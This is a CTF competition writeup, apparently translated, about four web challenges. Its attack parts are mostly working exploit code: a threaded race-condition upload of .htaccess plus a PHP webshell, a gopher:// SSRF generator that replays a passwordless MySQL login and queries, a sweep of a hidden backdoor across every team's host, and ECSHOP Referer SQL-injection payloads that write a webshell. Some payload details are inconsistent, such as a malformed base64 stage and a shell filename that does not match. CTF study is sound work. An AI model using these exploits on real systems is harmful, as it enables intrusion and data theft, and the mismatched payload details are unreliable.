Congratulations to our team bleem on a strong result in this competition. Keep it up!
Jeopardy
The morning Jeopardy session had two web challenges.
web1:
This challenge lets you upload an image. Changing the file type to php in Burp and uploading it returns the hint '比比谁速度快' ("let's see who is faster"). Uploading a .htaccess also goes through, so the intended route is a race condition: keep re-uploading .htaccess so that it is present on the server, then upload an image containing a PHP one-liner; while the .htaccess is in place Apache executes the image as PHP and you get a shell.
Script that keeps uploading .htaccess:
import requests
import time

# Rule that makes Apache run any file whose name matches "jpg" as PHP
HTACCESS = b'''<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
'''

# Re-upload .htaccess in a loop so that it exists on the server long enough
# for the image webshell to be uploaded and requested (race condition)
while True:
    files = {'file': ('.htaccess', HTACCESS, 'image/jpeg')}
    r = requests.post('http://127.0.0.1/upload', files=files)
    time.sleep(0.5)
Then upload a jpg containing a PHP one-liner and request it while the .htaccess is present:
shell.jpg:
<?php system('cat /flag.txt');?>
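The full race as an added example (not code from the writeup), written against the standard library only so that the multipart upload is visible. The /upload endpoint and the form field "file" come from the script above; the path the uploaded image is served from (/upload/shell.jpg here) is an assumption the page does not state. Three threads keep .htaccess and shell.jpg on disk and poll shell.jpg until a request lands while both are present:

```python
import http.client
import threading
import time
import uuid

# From the writeup: multipart POST, form field "file", endpoint /upload.
HOST, PORT = '127.0.0.1', 80
UPLOAD_PATH = '/upload'
FIELD = 'file'
# Assumption (not stated on the page): where the server serves uploaded files from.
SERVED_PATH = '/upload/shell.jpg'

HTACCESS = b'<FilesMatch "jpg">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
SHELL_JPG = b"<?php system('cat /flag.txt');?>"


def multipart_body(field, filename, content, content_type='image/jpeg'):
    """Build a multipart/form-data body by hand (what requests' files= does).
    Returns (body, value for the Content-Type header)."""
    boundary = uuid.uuid4().hex
    parts = [
        b'--' + boundary.encode(),
        ('Content-Disposition: form-data; name="%s"; filename="%s"'
         % (field, filename)).encode(),
        ('Content-Type: %s' % content_type).encode(),
        b'',
        content,
        b'--' + boundary.encode() + b'--',
        b'',
    ]
    return b'\r\n'.join(parts), 'multipart/form-data; boundary=' + boundary


def http_request(method, path, body=None, headers=None):
    """One short-lived request; returns (status, response body)."""
    conn = http.client.HTTPConnection(HOST, PORT, timeout=3)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def upload(filename, content):
    body, ctype = multipart_body(FIELD, filename, content)
    return http_request('POST', UPLOAD_PATH, body, {'Content-Type': ctype})


def executed_as_php(status, body):
    """True once shell.jpg is served through the PHP handler: we get command
    output rather than the PHP source echoed back as an image (or a 404 after
    the server has cleaned the file up again)."""
    return status == 200 and body.strip() != b'' and b'<?php' not in body


def race(duration=30.0, pause=0.05):
    """Three concurrent roles: keep .htaccess on disk, keep shell.jpg on disk,
    and poll shell.jpg until the request lands while both are present."""
    stop = threading.Event()
    result = {}
    errors = (OSError, http.client.HTTPException)

    def keep_uploading(name, content):
        while not stop.is_set():
            try:
                upload(name, content)
            except errors:
                pass
            time.sleep(pause)

    def poll():
        while not stop.is_set():
            try:
                status, body = http_request('GET', SERVED_PATH)
            except errors:
                time.sleep(pause)
                continue
            if executed_as_php(status, body):
                result['output'] = body
                stop.set()

    workers = [threading.Thread(target=keep_uploading, args=('.htaccess', HTACCESS)),
               threading.Thread(target=keep_uploading, args=('shell.jpg', SHELL_JPG)),
               threading.Thread(target=poll)]
    for w in workers:
        w.daemon = True
        w.start()
    stop.wait(duration)   # returns early as soon as poll() has the output
    stop.set()
    return result.get('output')


if __name__ == '__main__':
    out = race()
    print(out.decode(errors='replace') if out else 'no shell within the time limit')
```

The success test is deliberately "no <?php in the body": without the handler Apache serves the jpg as a static file and echoes the source back, with the handler it returns the command output, and a 404 in between means the server removed the file before the request arrived.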
web2:
This challenge reads /etc/passwd through the file:// protocol, but file:///flag.txt does not exist and reading index.php is blocked. Viewing the page source (F12) shows that the flag is stored in MySQL, so the first idea was to read it through gopher://. I did not manage to get a working payload together during the competition, but whether or not this method is right, it is worth recording as something learned.
Connect to MySQL with a client and run the query you want to replay.
Capture the session with Wireshark, use Follow TCP Stream, and keep only the client-to-server data (shown in red).
Convert that byte stream into a percent-encoded gopher payload:
gopher://127.0.0.1:3306/_%26%00%00%01%85%a6%03%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%28%00%00%00%03%73%65%6c%65%63%74%20%69%6e%66%6f%20%66%72%6f%6d%20%64%76%77%61%2e%63%74%68%61%63%6b%20%77%68%65%72%65%20%69%64%3d%32
The remaining problem was CRLF: when testing with curl, append %0d%0a to the end of the payload. Note also that this login packet is for root with an empty password (the length byte after root\0 is 0); an account with a password cannot be replayed this way, because the auth response is computed from the random salt in the server greeting.
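An added example (not from the writeup) that builds the same bytes as the payload above from the protocol fields instead of a packet capture: the HandshakeResponse41 for root with an empty password, followed by one COM_QUERY packet per statement, percent-encoded into a gopher:// URL with the trailing CRLF. The host, port, user and the dvwa.cthack table repeat the ones in the payload and are illustrative.

```python
import struct

# MySQL client capability flags (subset; values from the MySQL client/server protocol)
CLIENT_LONG_PASSWORD     = 0x00000001
CLIENT_LONG_FLAG         = 0x00000004
CLIENT_LOCAL_FILES       = 0x00000080
CLIENT_PROTOCOL_41       = 0x00000200
CLIENT_INTERACTIVE       = 0x00000400
CLIENT_TRANSACTIONS      = 0x00002000
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_MULTI_STATEMENTS  = 0x00010000
CLIENT_MULTI_RESULTS     = 0x00020000

# Exactly the flag set seen in the captured payload above (0x0003a685)
DEFAULT_CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_LOCAL_FILES
                | CLIENT_PROTOCOL_41 | CLIENT_INTERACTIVE | CLIENT_TRANSACTIONS
                | CLIENT_SECURE_CONNECTION | CLIENT_MULTI_STATEMENTS
                | CLIENT_MULTI_RESULTS)
COM_QUERY = 0x03


def mysql_packet(payload, seq):
    """Frame a payload as a MySQL packet: 3-byte little-endian length + 1-byte sequence id."""
    return struct.pack('<I', len(payload))[:3] + bytes([seq]) + payload


def handshake_response(user, caps=DEFAULT_CAPS, max_packet=0x01000000, charset=0x08):
    """HandshakeResponse41 for an account with an empty password.

    With CLIENT_SECURE_CONNECTION the auth-response is length-prefixed, so an
    empty password is the single byte 0x00. A real password cannot be replayed
    this way: its response is derived from the salt in the server greeting.
    """
    body = struct.pack('<IIB', caps, max_packet, charset)
    body += b'\x00' * 23                 # reserved, all zero
    body += user.encode() + b'\x00'      # NUL-terminated user name
    body += b'\x00'                      # auth-response length 0
    return mysql_packet(body, seq=1)     # seq 1: answers the greeting, which is seq 0


def com_query(sql):
    """COM_QUERY command; every command starts a new sequence at 0."""
    return mysql_packet(bytes([COM_QUERY]) + sql.encode(), seq=0)


def gopher_mysql_url(host, port, user, queries, crlf=True):
    """Wrap login + queries in a gopher:// URL. The '_' after the slash is the
    gopher item-type selector and is stripped before the bytes go on the wire.
    Every byte is %XX-encoded so the SSRF client forwards it untouched."""
    raw = handshake_response(user) + b''.join(com_query(q) for q in queries)
    if crlf:
        raw += b'\r\n'                   # the trailing CRLF the curl test needed
    return 'gopher://%s:%d/_%s' % (host, port, ''.join('%%%02x' % b for b in raw))


if __name__ == '__main__':
    print(gopher_mysql_url('127.0.0.1', 3306, 'root', [
        'select @@version_comment limit 1',
        'select info from dvwa.cthack where id=2',
    ]))
```

Run it and the output matches the captured payload byte for byte (plus the %0d%0a): 0x26 is the 38-byte login body, 0x21 and 0x28 are the 33- and 40-byte COM_QUERY bodies. The server never validates the client's sequence numbers against a real handshake, which is why a blind replay of this login works at all when the account has no password.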
AWD mode
The afternoon AWD session also had only two web services.
web1:
On web1, ls -a in /var/www/html/ reveals a hidden backdoor, .shell.php. It filters the word flag, which is bypassed with a shell glob: cat /fla*.
Script:
import requests

# Every team's web1 box lives at 172.20.<team>.101 (teams 101..112)
targets = ['http://172.20.%d.101' % i for i in range(101, 113)]

# .shell.php evaluates the 'cmd' parameter; "flag" is filtered, so glob the filename
data = {'cmd': 'system("cat /fla*");'}

for url in targets:
    try:
        r = requests.post(url + '/.shell.php', data=data, timeout=0.5)
    except requests.RequestException:
        continue  # host down, patched, or too slow: move on to the next team
    print(url)
    print(r.text)
web2:
ECSHOP remote code execution: SQL injection through the Referer header handled by user.php, ending in eval.
First run the curl payloads (kept in the docstring of the script below) to plant the webshell, then sweep the other teams with the script. One check worth making on the commands: the hex in the Referer decodes to eval($_POST[vulnspy]);, so the parameter the injected code reads is vulnspy, while the -d bodies send okami=; the two names have to match for the first stage to execute.
Script:
import requests

'''
Plant the webshell first (Referer injection in user.php, phpinfo() as a test, then the file write):

curl "http://172.20.102.102/user.php" -d "action=login&okami=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
curl "http://172.20.102.102/user.php" -d "action=login&okami=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbChbb2thbWldKTsnKQoOw));exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
'''

# Every team's web2 box lives at 172.20.<team>.102 (teams 101..112)
targets = ['http://172.20.%d.102' % i for i in range(101, 113)]

for url in targets:
    try:
        # okami.php is the dropped shell; it evaluates the okami parameter
        r = requests.post(url + '/okami.php?okami=system("cat /flag.txt");', timeout=0.5)
    except requests.RequestException:
        continue  # host down, patched, or too slow: move on to the next team
    print(url)
    print(r.text)